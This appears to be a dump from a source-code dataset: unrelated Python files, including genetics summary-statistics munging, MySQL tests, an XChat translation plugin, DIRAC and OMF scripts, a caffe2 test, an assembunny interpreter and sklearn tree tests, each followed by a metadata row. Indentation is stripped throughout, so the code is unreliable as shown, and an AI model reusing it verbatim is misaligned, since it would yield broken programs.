c for c in dat.columns if c in ['SNP', 'N', 'Z', 'A1', 'A2']]
if args.keep_maf and 'FRQ' in dat.columns:
print_colnames.append('FRQ')
signed_sumstats = [k for k,v in cname_translation.items() if v=='SIGNED_SUMSTAT']
assert len(signed_sumstats)==1
if args.keep_beta and signed_sumstats[0]=='BETA' and 'SIGNED_SUMSTAT' in dat.columns:
print_colnames.append('BETA')
dat.rename(columns={'SIGNED_SUMSTAT':'BETA'}, inplace=True)
if args.keep_se and 'SE' in dat.columns:
print_colnames.append('SE')
if write_out:
out_fname = args.out + '.sumstats'
dat=dat[dat.N.notnull()] # added
msg = 'Writing summary statistics for {M} SNPs ({N} with nonmissing N) to {F}.'
logging.info(
msg.format(M=len(dat), F=out_fname + '.gz', N=dat.N.notnull().sum()))
dat.to_csv(out_fname, sep="\t", index=False,
columns=print_colnames, float_format='%.10f')
os.system('gzip -f {F}'.format(F=out_fname))
logging.info('Dropping snps with null values')
dat = dat[dat.N.notnull()]
logging.info('\nMetadata:')
dat = dat[dat.N.notnull()]
CHISQ = np.square(dat.Z) # ** 2)
mean_chisq = CHISQ.mean()
logging.info('Mean chi^2 = ' + str(round(mean_chisq, 3)))
if mean_chisq < 1.02:
logging.info("WARNING: mean chi^2 may be too small.")
logging.info('Lambda GC = ' + str(round(CHISQ.median() / 0.4549, 3)))
logging.info('Max chi^2 = ' + str(round(CHISQ.max(), 3)))
logging.info('{N} Genome-wide significant SNPs (some may have been removed by filtering).'.format(N=(CHISQ > 29).sum()))
return dat
except Exception:
logging.info('\nERROR converting summary statistics:\n')
ex_type, ex, tb = sys.exc_info()
logging.info(traceback.format_exc(ex))
raise
finally:
logging.info('\nConversion finished at {T}'.format(T=time.ctime()))
logging.info('Total time elapsed: {T}'.format(
T=allele_info.sec_to_str(round(time.time() - START_TIME, 2))))
if __name__ == '__main__':
d = munge_sumstats(parser.parse_args(), write_out=True)
| gpl-3.0 | -8,876,316,338,793,550,000 | 38.220682 | 163 | 0.557286 | false |
mosquito/Tornado-MySQL | tornado_mysql/tests/test_connection.py | 4 | 2755 | import time
from tornado.testing import gen_test
from tornado import gen
import tornado_mysql
from tornado_mysql.tests import base
class TestConnection(base.PyMySQLTestCase):
@gen_test
def test_utf8mb4(self):
"""This test requires MySQL >= 5.5"""
arg = self.databases[0].copy()
arg['charset'] = 'utf8mb4'
conn = yield tornado_mysql.connect(**arg)
@gen_test
def test_largedata(self):
"""Large query and response (>=16MB)"""
cur = self.connections[0].cursor()
yield cur.execute("SELECT @@max_allowed_packet")
if cur.fetchone()[0] < 16*1024*1024 + 10:
print("Set max_allowed_packet to bigger than 17MB")
else:
t = 'a' * (16*1024*1024)
yield cur.execute("SELECT '" + t + "'")
assert cur.fetchone()[0] == t
@gen_test
def test_escape_string(self):
con = self.connections[0]
cur = con.cursor()
self.assertEqual(con.escape("foo'bar"), "'foo\\'bar'")
yield cur.execute("SET sql_mode='NO_BACKSLASH_ESCAPES'")
self.assertEqual(con.escape("foo'bar"), "'foo''bar'")
@gen_test
def test_autocommit(self):
con = self.connections[0]
self.assertFalse(con.get_autocommit())
cur = con.cursor()
yield cur.execute("SET AUTOCOMMIT=1")
self.assertTrue(con.get_autocommit())
yield con.autocommit(False)
self.assertFalse(con.get_autocommit())
yield cur.execute("SELECT @@AUTOCOMMIT")
self.assertEqual(cur.fetchone()[0], 0)
@gen_test
def test_select_db(self):
con = self.connections[0]
current_db = self.databases[0]['db']
other_db = self.databases[1]['db']
cur = con.cursor()
yield cur.execute('SELECT database()')
self.assertEqual(cur.fetchone()[0], current_db)
yield con.select_db(other_db)
yield cur.execute('SELECT database()')
self.assertEqual(cur.fetchone()[0], other_db)
@gen_test
def test_connection_gone_away(self):
"""
http://dev.mysql.com/doc/refman/5.0/en/gone-away.html
http://dev.mysql.com/doc/refman/5.0/en/error-messages-client.html#error_cr_server_gone_error
"""
con = self.connections[0]
cur = con.cursor()
yield cur.execute("SET wait_timeout=1")
time.sleep(2)
with self.assertRaises(tornado_mysql.OperationalError) as cm:
yield cur.execute("SELECT 1+1")
# error occures while reading, not writing because of socket buffer.
#self.assertEquals(cm.exception.args[0], 2006)
self.assertIn(cm.exception.args[0], (2006, 2013))
if __name__ == "__main__":
import unittest
unittest.main()
| mit | 2,432,940,451,073,849,300 | 31.411765 | 100 | 0.600363 | false |
cngo-github/translation-server | src/irc/queue/xchat/xchat-translator-2.7.5.py | 1 | 15038 | # -*- coding: utf-8 -*-
__module_name__ = "Xchat Translator"
__module_version__ = "-.-"
__module_description__ = "Performs translations from one language to another"
__module_author__ = "Chuong Ngo"
import xchat
import json
import socket
import select
DEFAULT_LANG = "en"
MAX_ERROR = 3
# Must be either True or False and the capitalization matters.
ECHO = False
SERVER_IP = "127.0.0.1"
SERVER_PORT = 4242
BUFFER_SIZE = 1024
TIMER = 100
ENABLE_UPDATELANG = False
LANGUAGES = {
'AFRIKAANS' : 'af',
'ALBANIAN' : 'sq',
'AMHARIC' : 'am',
'ARABIC' : 'ar',
'ARMENIAN' : 'hy',
'AZERBAIJANI' : 'az',
'BASQUE' : 'eu',
'BELARUSIAN' : 'be',
'BENGALI' : 'bn',
'BIHARI' : 'bh',
'BULGARIAN' : 'bg',
'BURMESE' : 'my',
'CATALAN' : 'ca',
'CHEROKEE' : 'chr',
'CHINESE' : 'zh',
'CHINESE_SIMPLIFIED' : 'zh-CN',
'CHINESE_TRADITIONAL' : 'zh-TW',
'CROATIAN' : 'hr',
'CZECH' : 'cs',
'DANISH' : 'da',
'DHIVEHI' : 'dv',
'DUTCH': 'nl',
'ENGLISH' : 'en',
'ESPERANTO' : 'eo',
'ESTONIAN' : 'et',
'FILIPINO' : 'tl',
'FINNISH' : 'fi',
'FRENCH' : 'fr',
'GALICIAN' : 'gl',
'GEORGIAN' : 'ka',
'GERMAN' : 'de',
'GREEK' : 'el',
'GUARANI' : 'gn',
'GUJARATI' : 'gu',
'HEBREW' : 'iw',
'HINDI' : 'hi',
'HUNGARIAN' : 'hu',
'ICELANDIC' : 'is',
'INDONESIAN' : 'id',
'INUKTITUT' : 'iu',
'IRISH' : 'ga',
'ITALIAN' : 'it',
'JAPANESE' : 'ja',
'KANNADA' : 'kn',
'KAZAKH' : 'kk',
'KHMER' : 'km',
'KOREAN' : 'ko',
'KURDISH': 'ku',
'KYRGYZ': 'ky',
'LAOTHIAN': 'lo',
'LATVIAN' : 'lv',
'LITHUANIAN' : 'lt',
'MACEDONIAN' : 'mk',
'MALAY' : 'ms',
'MALAYALAM' : 'ml',
'MALTESE' : 'mt',
'MARATHI' : 'mr',
'MONGOLIAN' : 'mn',
'NEPALI' : 'ne',
'NORWEGIAN' : 'no',
'ORIYA' : 'or',
'PASHTO' : 'ps',
'PERSIAN' : 'fa',
'POLISH' : 'pl',
'PORTUGUESE' : 'pt-PT',
'PUNJABI' : 'pa',
'ROMANIAN' : 'ro',
'RUSSIAN' : 'ru',
'SANSKRIT' : 'sa',
'SERBIAN' : 'sr',
'SINDHI' : 'sd',
'SINHALESE' : 'si',
'SLOVAK' : 'sk',
'SLOVENIAN' : 'sl',
'SPANISH' : 'es',
'SWAHILI' : 'sw',
'SWEDISH' : 'sv',
'TAJIK' : 'tg',
'TAMIL' : 'ta',
'TAGALOG' : 'tl',
'TELUGU' : 'te',
'THAI' : 'th',
'TIBETAN' : 'bo',
'TURKISH' : 'tr',
'UKRAINIAN' : 'uk',
'URDU' : 'ur',
'UZBEK' : 'uz',
'UIGHUR' : 'ug',
'VIETNAMESE' : 'vi',
'WELSH' : 'cy',
'YIDDISH' : 'yi'
}
LANG_CODES = dict((v,k) for (k,v) in LANGUAGES.items())
WATCHLIST = {}
CHANWATCHLIST = {}
IGNORELIST = {}
ACTIVE_JOBS = 0
TIMEOUT_HOOK = None
CONN = None
class Translator:
def translate(cls, channel, user, text, tgtLang = DEFAULT_LANG, echo = False, outgoing = False, srcLang = "auto", tgtTxt = None, echoTxt = None, kill = False, read = False):
global CONN
request = dict(Outgoing = outgoing, Channel = channel, User = user, Srctxt = text, Srclang = srcLang, Tgttxt = tgtTxt, Tgtlang = tgtLang, Echotxt = echoTxt, Echo = echo, Kill = kill, Read = read)
cls.connectToServer()
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
return None
translate = classmethod(translate)
def readResults(cls, userdata = None):
global TIMEOUT_HOOK
global WATCHLIST
global IGNORELIST
global ACTIVE_JOBS
request = dict(Outgoing = None, Channel = None, User = None, Srctxt = None, Srclang = None, Tgttxt = None, Tgtlang = None, Echotxt = None, Echo = False, Kill = False, Read = True)
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
result = json.loads(CONN.recv(BUFFER_SIZE).decode("utf-8"))
key = result["Channel"] + " " + result["User"]
user = result["User"]
if type(result) == dict:
if result["Outgoing"]:
pruser = "- " + user
txt = pruser + result["Tgttxt"]
xchat.command("say " + txt.encode("utf-8"))
if ECHO:
context = xchat.find_context(channel=result["Channel"])
txt = result["Echotxt"].encode("utf-8")
context.emit_print("Channel Message", "_[echo]", txt)
if WATCHLIST is not None and key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt - 1
if src == "auto" and ENABLE_DEFAULTLANG:
src = result["Srclang"]
WATCHLIST[key] = (dest, src, cnt)
elif user is not None and user != "" and ENABLE_DEFAULTLANG:
dest = DEFAULT_LANG
src = result["Srclang"]
cnt = 0
WATCHLIST[key] = (dest, src, cnt)
pass
elif result["Srclang"] != result["Tgtlang"] and user is not None and user != "":
context = xchat.find_context(channel=result["Channel"])
txt = result["Tgttxt"].encode("utf-8")
context.emit_print("Channel Message", "_[%s]" %(result["User"]), txt)
if WATCHLIST is not None and key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt - 1
if src == "auto" and ENABLE_DEFAULTLANG:
src = result["Srclang"]
WATCHLIST[key] = (dest, src, cnt)
pass
if result["Srclang"] == result["Tgtlang"] and user is not None and user != "":
cnt = 1
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
cnt = cnt + 1
WATCHLIST[key] = (dest, src, cnt)
else:
dest = DEFAULT_LANG
src = result["Srclang"]
cnt = 1
WATCHLIST[key] = (dest, src, cnt)
if cnt >= MAX_ERROR:
WATCHLIST.pop(key, None)
IGNORELIST[key] = (dest, src)
ACTIVE_JOBS -= 1
if ACTIVE_JOBS <= 0:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
cls.closeConnection()
return None
readResults = classmethod(readResults)
def connectToServer(cls, ip = SERVER_IP, port = SERVER_PORT):
global CONN
if CONN is None:
CONN = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
CONN.connect((ip, port))
return None
connectToServer = classmethod(connectToServer)
def closeConnection(cls):
global CONN
global ACTIVE_JOBS
request = dict(Outgoing = None, Channel = None, User = None, Srctxt = None, Srclang = None, Tgttxt = None, Tgtlang = None, EchoTxt = None, Echo = False, Kill = True, Read = False)
jsonStr = json.dumps(request).encode("utf-8")
CONN.send(jsonStr)
CONN = None
ACTIVE_JOBS = 0
return None
closeConnection = classmethod(closeConnection)
def findLangCode(language):
lang = language.upper()
if lang in LANGUAGES:
return LANGUAGES[lang]
if lang.lower() in LANG_CODES:
return lang.lower()
return None
def addTranslationJob(text, targetLang, srcLang, channel, user, echo = False, outgoing = False):
global TIMEOUT_HOOK
global TIMER
global ACTIVE_JOBS
ACTIVE_JOBS += 1
Translator.translate(channel, user, text, targetLang, echo, outgoing, srcLang)
if TIMEOUT_HOOK is None:
TIMEOUT_HOOK = xchat.hook_timer(TIMER, Translator.readResults)
return None
def removeUser(key):
global WATCHLIST
global IGNORELIST
if WATCHLIST is not None and WATCHLIST.pop(key, None) is not None:
xchat.prnt("Removed " + key + " from the watch list.")
if IGNORELIST is not None and IGNORELIST.pop(key, None) is not None:
xchat.prnt("Removed " + key + " from the ignore list.")
return None
def quitRemoveUser(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[0]
if user is None:
return xchat.EAT_NONE
key = channel + " " + user.lower()
removeUser(key)
return xchat.EAT_NONE
xchat.hook_print("Quit", quitRemoveUser)
def kickRemoveUser(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[1]
if user is None:
return xchat.EAT_NONE
key = channel + " " + user.lower()
removeUser(key)
return xchat.EAT_NONE
xchat.hook_print("Kick", kickRemoveUser)
def updateUserNick(word, word_eol, userdata):
channel = xchat.get_info("channel")
userOld = word[0]
userNew = word[1]
if userOld is None or userNew is None:
return xchat.EAT_NONE
userOld = userOld.lower()
userNew = userNew.lower()
key = channel + " " + userOld
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if WATCHLIST.pop(key, None) is not None:
WATCHLIST[xchat.get_info("channel") + " " + userNew.lower()] = (dest, src, cnt)
xchat.prnt("Watching " + userNew + ", fomerly " + userOld)
return xchat.EAT_NONE
xchat.hook_print("Change Nick", updateUserNick)
def translateIncoming(word, word_eol, userdata):
channel = xchat.get_info("channel")
user = word[0].lower()
key = channel + " " + user
chanKey = channel + " " + channel
if key in WATCHLIST and not user.startswith("_["):
dest, src, cnt = WATCHLIST[key]
addTranslationJob(word_eol[1], dest, src, channel, user)
if chanKey in CHANWATCHLIST and not user.startswith("_["):
dest, src = CHANWATCHLIST[chanKey]
addTranslationJob(word_eol[1], dest, src, channel, user)
return xchat.EAT_NONE
xchat.hook_print("Channel Message", translateIncoming)
xchat.hook_print("Channel Msg Hilight", translateIncoming)
def translateOutgoing(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_NONE
channel = xchat.get_info("channel")
user = word[0].lower()
key = channel + " " + user
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if src != "auto":
addTranslationJob(word_eol[1], src, dest, channel, user, ECHO, True)
return xchat.EAT_ALL
key = key[:-1]
if key in WATCHLIST:
dest, src, cnt = WATCHLIST[key]
if src != "auto":
addTranslationJob(word_eol[1], src, dest, channel, user, ECHO, True)
return xchat.EAT_ALL
return xchat.EAT_NONE
xchat.hook_command('', translateOutgoing, help = "Triggers on all /say commands")
def addUser(word, word_eol, userdata):
global WATCHLIST
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
src = "auto"
dest = DEFAULT_LANG
if len(word) > 2 :
src = findLangCode(word[2])
if src is None:
xchat.prnt("The specified language is invalid.")
return xchat.EAT_ALL
pass
if len(word) > 3:
lang = findLangCode(word[3])
if lang is not None:
dest = lang
pass
key = xchat.get_info("channel") + " " + user.lower()
WATCHLIST[key] = (dest, src, 0)
xchat.prnt("Now watching user: " + user + ", source: " + src + ", target: " + dest)
return xchat.EAT_ALL
xchat.hook_command("ADDTR", addUser, help = "/ADDTR {user} {source_language} {target_language} - adds the specified user to the watchlist. If {source_language} and/or {target_language} is not specified, then 'auto' will be used for the {source_language} and the DEFAULT_LANG will be used for the {target_language}.")
def addChannel(word, word_eol, userdata):
global CHANWATCHLIST
channel = xchat.get_info("channel")
CHANWATCHLIST[channel + " " + channel] = (DEFAULT_LANG, "auto")
xchat.prnt("Now watching channel: " + channel)
return xchat.EAT_ALL
xchat.hook_command("ADDCHAN", addChannel, help = "/ADDCHAN - adds the current channel to the channel watch list")
def addIgnore(word, word_eol, userdata):
global IGNORELIST
if len(word) < 2:
return xchat.EAT_ALL
channel = xchat.get_info("channel")
user = word[1]
IGNORELIST[channel + " " + user] = (DEFAULT_LANG, "auto")
xchat.prnt("Now ignoring user: " + user)
return xchat.EAT_ALL
xchat.hook_command("ADDIG", addIgnore, help = "/ADDCHAN {user_nick} - adds the {user_nick} to the ignore list")
def manualRemoveUser(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
if user is None:
return xchat.EAT_ALL
removeUser(xchat.get_info("channel") + " " + user.lower())
return xchat.EAT_ALL
xchat.hook_command("RMTR", manualRemoveUser, help = "/RMTR {user_nick} - removes {user_nick} from the watch list for automatic translations.")
def removeChannel(word, word_eol, userdata):
channel = xchat.get_info("channel")
if CHANWATCHLIST.pop(channel + " " + channel, None) is not None:
xchat.prnt("Channel %s has been removed from the watch list." %channel)
return xchat.EAT_ALL
xchat.hook_command("RMCHAN", removeChannel, help = "/RMCHAN - removes the channel from the channel watch list for automatic translations.")
def removeIgnore(word, word_eol, userdata):
if len(word) < 2:
return xchat.EAT_ALL
user = word[1]
if IGNORELIST.pop(xchat.get_info("channel") + " " + user.lower(), None) is not None:
xchat.prnt("User %s has been removed from the ignore list." %user)
return xchat.EAT_ALL
xchat.hook_command("RMIG", removeIgnore, help = "/RMTR {user_nick} - removes {user_nick} from the ignore list.")
def translateAndSay(word, word_eol, userdata):
if len(word) < 3:
return xchat.EAT_ALL
lang = findLangCode(word[1])
if lang is None:
xchat.prnt("Invalid language name or code. Aborting translation.")
return xchat.EAT_ALL
addTranslationJob(word_eol[2], lang, "auto", xchat.get_info("channel"), None, ECHO, True)
return xchat.EAT_ALL
xchat.hook_command("TRSEND", translateAndSay, help="/TRSEND {dest_lang} {text} - translates the {text} into the {desk_lang} langugage.")
def translate(word, word_eol, userdata):
addTranslationJob(word_eol[2], word[1], "auto", xchat.get_info("channel"), word[0].lower())
return xchat.EAT_ALL
xchat.hook_command("TR", translate, help="/TR {dest_lang} {text} - translates the {text} into the {desk_lang} langugage.")
def printWatchList(word, word_eol, userdata):
xchat.prnt("Printing watch list (nick, channel, src, dest, error count)")
for key in WATCHLIST.keys():
channel, user = key.split(' ')
dest, src, cnt = WATCHLIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest + " " + str(cnt))
return xchat.EAT_ALL
xchat.hook_command("LSUSERS", printWatchList, help = "/LSUSERS - prints out all users on the watch list for automatic translations to the screen locally.")
def printChanWatchList(word, word_eol, userdata):
xchat.prnt("Printing channel watch list (nick, channel, src, dest)")
for key in CHANWATCHLIST.keys():
channel, user = key.split(' ')
dest, src = CHANWATCHLIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest)
return xchat.EAT_ALL
xchat.hook_command("LSCHAN", printChanWatchList, help = "/LSCHAN - prints out all channels on the channel watch list for automatic translations to the screen locally.")
def printIgnoreList(word, word_eol, userdata):
xchat.prnt("Printing ignore list (nick, channel, src, dest)")
for key in IGNORELIST.keys():
channel, user = key.split(' ')
dest, src = IGNORELIST[key]
xchat.prnt("- " + user + " " + channel + " " + src + " " + dest)
return xchat.EAT_ALL
xchat.hook_command("LSIG", printIgnoreList, help = "/LSUSERS - prints out all users on the ignore list.")
def initialize(word, word_eol, userdata):
global CONN
global ACTIVE_JOBS
global WATCHLIST
global TIMEOUT_HOOK
if TIMEOUT_HOOK is not None:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
if CONN is not None:
CONN.close()
CONN = None
ACTIVE_JOBS = 0
WATCHLIST = {}
xchat.prnt("Translator reinitialized")
return xchat.EAT_ALL
xchat.hook_command("TRINIT", initialize, help = "/TRINIT - reinitializes the plugin.")
def unload_plugin(userdata):
global TIMEOUT_HOOK
global CONN
if TIMEOUT_HOOK is not None:
xchat.unhook(TIMEOUT_HOOK)
TIMEOUT_HOOK = None
if CONN is not None:
Translator.closeConnection()
xchat.prnt("Translator is unloaded.")
return None
xchat.hook_unload(unload_plugin)
xchat.prnt("Translator is loaded.")
| mit | 1,971,687,278,613,201,400 | 25.853571 | 317 | 0.654941 | false |
Andrew-McNab-UK/DIRAC | Interfaces/scripts/dirac-wms-job-status.py | 7 | 2067 | #!/usr/bin/env python
########################################################################
# $HeadURL$
# File : dirac-wms-job-status
# Author : Stuart Paterson
########################################################################
"""
Retrieve status of the given DIRAC job
"""
__RCSID__ = "$Id$"
import os
import DIRAC
from DIRAC import exit as DIRACExit
from DIRAC.Core.Base import Script
from DIRAC.Core.Utilities.Time import toString, date, day
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'\nUsage:\n',
' %s [option|cfgfile] ... JobID ...' % Script.scriptName,
'\nArguments:\n',
' JobID: DIRAC Job ID' ] ) )
Script.registerSwitch( "f:", "File=", "Get status for jobs with IDs from the file" )
Script.registerSwitch( "g:", "JobGroup=", "Get status for jobs in the given group" )
Script.parseCommandLine( ignoreErrors = True )
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
jobs = []
for key, value in Script.getUnprocessedSwitches():
if key.lower() in ( 'f', 'file' ):
if os.path.exists( value ):
jFile = open( value )
jobs += jFile.read().split()
jFile.close()
elif key.lower() in ( 'g', 'jobgroup' ):
jobDate = toString( date() - 30 * day )
# Choose jobs no more than 30 days old
result = dirac.selectJobs( jobGroup = value, date = jobDate )
if not result['OK']:
print "Error:", result['Message']
DIRACExit( -1 )
jobs += result['Value']
if len( args ) < 1 and not jobs:
Script.showHelp()
if len( args ) > 0:
jobs += parseArguments( args )
result = dirac.getJobStatus( jobs )
if result['OK']:
for job in result['Value']:
print 'JobID=' + str( job ),
for status in result['Value'][job].items():
print '%s=%s;' % status,
print
else:
exitCode = 2
print "ERROR: %s" % result['Message']
DIRAC.exit( exitCode )
| gpl-3.0 | -1,949,146,979,304,111,600 | 29.850746 | 95 | 0.54717 | false |
dpinney/omf | omf/models/commsBandwidth.py | 1 | 4260 | ''' Comms Bandwidth Model '''
import os, datetime, shutil
from os.path import join as pJoin
import networkx as nx
from omf import comms
from omf.models import __neoMetaModel__
from omf.models.__neoMetaModel__ import *
# Model metadata:
tooltip = "Calculate the bandwidth requirements for a communications system on a feeder"
modelName, template = __neoMetaModel__.metadata(__file__)
hidden = False
def work(modelDir, inputDict):
outData = {}
feederName = [x for x in os.listdir(modelDir) if x.endswith('.omd')][0][:-4]
inputDict['feederName1'] = feederName
feederPath = pJoin(modelDir,feederName+'.omd')
#delete previous saved omd/omc files so sotrage doesn't blow up - may need to adjust in future for editing
#for file in os.listdir(modelDir):
# if file.endswith(".omc") or file.endswith(".omd"):
# os.remove(pJoin(modelDir, file))
#shutil.copyfile(pJoin(__neoMetaModel__._omfDir, 'static', 'publicFeeders', feederName+'.omd'), pJoin(modelDir, feederName+'.omd'))
feeder = comms.createGraph(feederPath)
#set the omc objects
comms.setSmartMeters(feeder)
comms.setRFCollectors(feeder)
comms.setFiber(feeder)
comms.setRF(feeder)
#Calculate the bandwidth capacities
comms.setSmartMeterBandwidth(feeder, packetSize=int(inputDict['meterPacket']))
comms.setRFCollectorCapacity(feeder, rfBandwidthCap=int(inputDict['rfCapacity']))
comms.setFiberCapacity(feeder, fiberBandwidthCap=int(inputDict['fiberCapacity']), setSubstationBandwidth=True)
comms.setRFEdgeCapacity(feeder)
#calculate the bandwidth use
comms.calcBandwidth(feeder)
comms.saveOmc(comms.graphGeoJson(feeder), modelDir, feederName)
#bandwidth capacity vs bandwidth use
overloadedFiber = []
for edge in nx.get_edge_attributes(feeder, 'fiber'):
if feeder[edge[0]][edge[1]].get('fiber',False):
if feeder[edge[0]][edge[1]]['bandwidthUse'] > feeder[edge[0]][edge[1]]['bandwidthCapacity']:
overloadedFiber.append(edge)
overloadedCollectors = []
for rfCollector in nx.get_node_attributes(feeder, 'rfCollector'):
if feeder.nodes[rfCollector].get('rfCollector',False):
if feeder.nodes[rfCollector]['bandwidthUse'] > feeder.nodes[rfCollector]['bandwidthCapacity']:
overloadedCollectors.append(rfCollector)
outData['overloadedFiber'] = overloadedFiber
outData['overloadedCollectors'] = overloadedCollectors
if len(overloadedFiber) == 0:
outData['fiberStatus'] = 'passed'
else:
outData['fiberStatus'] = 'insufficient'
if len(overloadedCollectors) == 0:
outData['collectorStatus'] = 'passed'
else:
outData['collectorStatus'] = 'insufficient'
#cost calculations
outData['fiber_cost'] = comms.getFiberCost(feeder, float(inputDict.get('fiber_cost', 0)))
outData['rf_collector_cost'] = comms.getrfCollectorsCost(feeder, float(inputDict.get('rf_collector_cost', 0)))
outData['smart_meter_cost'] = comms.getsmartMetersCost(feeder, float(inputDict.get('smart_meter_cost', 0)))
outData['total_cost'] = outData['fiber_cost'] + outData['rf_collector_cost'] + outData['smart_meter_cost']
outData["stdout"] = "Success"
outData["stderr"] = ""
return outData
def new(modelDir):
''' Create a new instance of this model. Returns true on success, false on failure. '''
defaultInputs = {
"modelType": modelName,
"fiberCapacity": 10**6,
"rfCapacity": 10**3*5,
"meterPacket": 10,
"feederName1":"Olin Barre LatLon",
"fiber_cost": 3,
"rf_collector_cost": 30000,
"smart_meter_cost": 1000,
"created":str(datetime.datetime.now())
}
creationCode = __neoMetaModel__.new(modelDir, defaultInputs)
try:
shutil.copyfile(pJoin(__neoMetaModel__._omfDir, 'static', 'publicFeeders', defaultInputs['feederName1']+'.omd'), pJoin(modelDir, defaultInputs['feederName1']+'.omd'))
except:
return False
return creationCode
@neoMetaModel_test_setup
def _tests():
# Location
modelLoc = pJoin(__neoMetaModel__._omfDir,"data","Model","admin","Automated Testing of " + modelName)
# Blow away old test results if necessary.
try:
shutil.rmtree(modelLoc)
except:
# No previous test results.
pass
# Create New.
new(modelLoc)
# Pre-run.
__neoMetaModel__.renderAndShow(modelLoc)
# Run the model.
__neoMetaModel__.runForeground(modelLoc)
# Show the output.
__neoMetaModel__.renderAndShow(modelLoc)
if __name__ == '__main__':
_tests()
| gpl-2.0 | 3,672,570,366,437,700,000 | 34.206612 | 168 | 0.731925 | false |
davinwang/caffe2 | caffe2/python/mkl/mkl_fc_op_test.py | 4 | 1753 | # Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import hypothesis.strategies as st
from hypothesis import given, settings
import numpy as np
from caffe2.python import core, workspace
import caffe2.python.hypothesis_test_util as hu
import caffe2.python.mkl_test_util as mu
@unittest.skipIf(not workspace.C.has_mkldnn,
"Skipping as we do not have mkldnn.")
class MKLFcTest(hu.HypothesisTestCase):
@given(n=st.integers(1, 5), m=st.integers(1, 5),
k=st.integers(1, 5), **mu.gcs)
def test_mkl_fc(self,n, m, k, gc, dc):
X = np.random.rand(m, k).astype(np.float32) - 0.5
W = np.random.rand(n, k).astype(np.float32) - 0.5
b = np.random.rand(n).astype(np.float32) - 0.5
op = core.CreateOperator(
'FC',
['X', 'W', 'b'],
["Y"]
)
self.assertDeviceChecks(dc, op, [X, W, b], [0])
if __name__ == "__main__":
import unittest
unittest.main()
| apache-2.0 | -8,658,453,736,706,285,000 | 32.711538 | 78 | 0.637764 | false |
mofr/advent-of-code | 2016/assembunny.py | 1 | 1444 | def run(source, out=None, **registers):
statements = list(map(lambda s: [s.split()[0], s.split()[1:]], source.split('\n')))
pc = 0
reg = {
'a': 0,
'b': 0,
'c': 0,
'd': 0,
}
reg.update(registers)
def val(arg):
if arg in reg:
return reg[arg]
else:
return int(arg)
while pc < len(statements):
op, args = statements[pc]
if op == 'cpy':
reg[args[1]] = val(args[0])
elif op == 'inc':
reg[args[0]] += 1
elif op == 'dec':
reg[args[0]] -= 1
elif op == 'jnz':
if val(args[0]) != 0:
pc += val(args[1])
continue
elif op == 'add':
reg[args[1]] += val(args[0])
elif op == 'addmult':
reg[args[2]] += val(args[0]) * val(args[1])
elif op == 'out':
if out(val(args[0])):
break
elif op == 'tgl':
index = val(args[0]) + pc
if 0 <= index < len(statements):
op, args = statements[index]
if len(args) == 1:
statements[index][0] = 'dec' if op == 'inc' else 'inc'
else:
statements[index][0] = 'cpy' if op == 'jnz' else 'jnz'
else:
raise Exception("Unknown instruction {} at line {}".format(op, pc))
pc += 1
return reg
| apache-2.0 | -2,466,116,944,208,556,000 | 28.469388 | 87 | 0.40928 | false |
rahul-c1/scikit-learn | sklearn/tree/tests/test_tree.py | 6 | 29150 | """
Testing for the tree module (sklearn.tree).
"""
import pickle
import numpy as np
from functools import partial
from itertools import product
import platform
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_in
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_greater_equal
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import raises
from sklearn.utils.validation import check_random_state
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.tree import ExtraTreeClassifier
from sklearn.tree import ExtraTreeRegressor
from sklearn import tree
from sklearn import datasets
from sklearn.preprocessing._weights import _balance_weights
CLF_CRITERIONS = ("gini", "entropy")
REG_CRITERIONS = ("mse", )
CLF_TREES = {
"DecisionTreeClassifier": DecisionTreeClassifier,
"Presort-DecisionTreeClassifier": partial(DecisionTreeClassifier,
splitter="presort-best"),
"ExtraTreeClassifier": ExtraTreeClassifier,
}
REG_TREES = {
"DecisionTreeRegressor": DecisionTreeRegressor,
"Presort-DecisionTreeRegressor": partial(DecisionTreeRegressor,
splitter="presort-best"),
"ExtraTreeRegressor": ExtraTreeRegressor,
}
ALL_TREES = dict()
ALL_TREES.update(CLF_TREES)
ALL_TREES.update(REG_TREES)
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
